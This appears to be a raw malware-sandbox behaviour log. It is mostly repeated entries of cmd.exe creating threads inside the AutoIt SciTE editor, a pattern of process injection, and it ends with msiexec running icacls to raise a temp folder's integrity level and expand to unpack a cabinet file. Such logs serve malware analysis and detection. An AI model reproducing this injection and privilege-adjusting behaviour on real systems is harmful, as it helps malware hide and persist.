Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 25F0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2630000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2670000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 26B0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 26F0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2730000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2770000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 27B0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 27F0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2830000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2870000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 28B0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 28F0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2930000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2970000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 29B0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 29F0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2A30000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2A70000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2AB0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2AF0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2B30000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2B70000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2BB0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2BF0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2C30000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2C70000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2CA0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2E20000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2E60000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2EA0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2EE0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 2F10000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3090000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 30D0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3110000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3140000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 32C0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3300000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3340000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3370000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 34F0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3530000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3570000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 35B0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 35E0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3760000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 37A0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 37D0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3950000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3990000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 39D0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3A10000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3A50000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3A90000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3AD0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3B10000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3B50000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3B90000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3BD0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3C10000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3C50000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3C90000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3CD0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3D10000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3D50000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3D90000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3DD0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3E10000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3E50000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3E90000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3ED0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3F10000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3F50000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3F90000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 3FD0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4010000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4050000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4090000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 40D0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4110000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4150000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4190000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 41D0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4210000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4250000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4290000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 42D0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4310000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4350000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4390000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 43D0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4410000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4450000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4490000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 44D0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4510000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4550000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4590000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 45D0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4610000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4650000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4690000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 46D0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4710000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4750000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4790000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 47D0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4810000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4850000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4890000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 48D0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4910000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4950000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4990000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 49D0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4A10000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4A50000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4A90000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4AD0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4B10000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4B50000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4B90000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4BD0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4C10000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4C50000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4C90000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4CD0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4D10000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4D50000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4D90000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4DD0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4E10000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4E50000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4E90000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4ED0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4F10000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4F50000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4F90000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 4FD0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5000000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5180000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 51C0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5200000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5240000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5280000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 52C0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5300000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5340000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5380000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 53C0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5400000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5440000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5480000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 54C0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5500000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5540000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5580000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 55C0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5600000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5640000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5680000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 56C0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5700000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5740000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5780000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 57C0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5800000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5840000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5880000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 58C0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5900000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5940000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5980000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 59C0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5A00000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5A40000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5A80000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5AC0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5B00000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5B40000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5B70000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5CF0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5D30000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5D70000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5DB0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5DF0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5E30000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5E70000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5EB0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5EF0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5F30000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5F70000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5FB0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 5FF0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 6030000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 6070000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 60B0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 60F0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 6130000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 6170000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 61B0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 61F0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 6230000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 6270000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 62B0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 62F0000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 6330000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 6370000
Source: C:\Windows\SysWOW64\cmd.exe	Thread created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe EIP: 63B0000

Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
